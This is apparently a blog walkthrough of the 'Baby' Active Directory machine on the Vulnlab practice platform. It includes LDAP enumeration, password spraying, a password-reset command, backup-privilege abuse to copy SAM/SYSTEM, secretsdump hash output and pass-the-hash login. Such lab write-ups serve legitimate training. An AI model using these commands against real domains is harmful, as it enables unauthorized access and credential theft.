Meitoka blog
  • 👋About
  • ☢️Malware Development (crow)
    • Process, Thread & Handler
  • 🧊Hack The Box
    • 📦Boxes
  • 🚩TryHackMe stuffs
    • Walkthroughs
      • 🔟OWASP Top 10
      • SSRF
      • Buffer Overflow
    • Challenges (CTF)
      • ♟️Publisher
      • 🐰Wonderland
  • 🌋VULNLAB
    • Machines
      • 🐈Baby
      • 🎧Data
  • 🧠LEARNING
    • 💉SQLi
      • 📜SQLmap quick cheat sheet
      • ➡️In-Band SQLi
      • Inferential (Blind) SQL Injection
      • ⚠️SQLi warning
Powered by GitBook
On this page
  • Enumeration
  • Nmap
  • Ldapsearch
  • SMB
  • RPC
  • Kerbrute
  • Crackmapexec
  • Domain Enumeration
  • Hashes
  • PWNED 🏆
  1. VULNLAB
  2. Machines

Baby

Easy machine

PreviousMachinesNextData

Last updated 4 months ago

Enumeration

Nmap

Ldapsearch

Domain = baby.vl

ldapsearch -H ldap://$IP -x -b "DC=BABY,DC=VL"

I have now a lot of results that can be useful to analyse

About users (& a password inside the description of an user ⚠️):

dev (group)
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
it (group)
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell (password: **********)
Caroline.Robinson

SMB

Access denied in guest

We will try with our new creds: Teresa.Bell:**********

RPC

Try to enum domain users but I’m getting an access denied

Trying also with my new creds but not successful

Kerbrute

After trying a password spraying through all the users, I found the real creds:

Compromised user = Caroline.Robinson@baby.vl:**********

Crackmapexec

We need to change the password to connect to this user

We can use smbpasswd

smbpasswd.py -newpass 'Makito123!' 'baby.vl'/'Caroline.Robinson':'**********'@"$IP"

We have now: Caroline.Robinson':'Makito123!'

Domain Enumeration

Doing some domain enumeration with Bloodhound & PowerShell

We can confirm that the user Caroline.Robinson can backup files and so, we can gat the SAM & SYSTEM files to possibly crack or pass the Admin hash

Hashes

> secretsdump -sam SAM.save -system SYSTEM.save LOCAL

Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b5??????????????????????:8d992faed3??????????????????????:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

But we can do nothing with the Admin hash because it’s a local admin so we can’t use this account to connect to the DC

We need also this ntds.dit

After following the blog, I can login with the hash with Evil-WinRM and get the root flag

PWNED 🏆

🌋
🐈
https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secretwww.thehacker.recipes
image.png
image.png
image.png
image.png
Backup Operator Privilege Escalation < BorderGateBorderGate
Dumping Domain Controller Hashes Locally and RemotelyRed Teaming Experiments
FzF_StormZ just pwned Baby @ Vulnlab!
Logo
Logo
Logo
Page cover image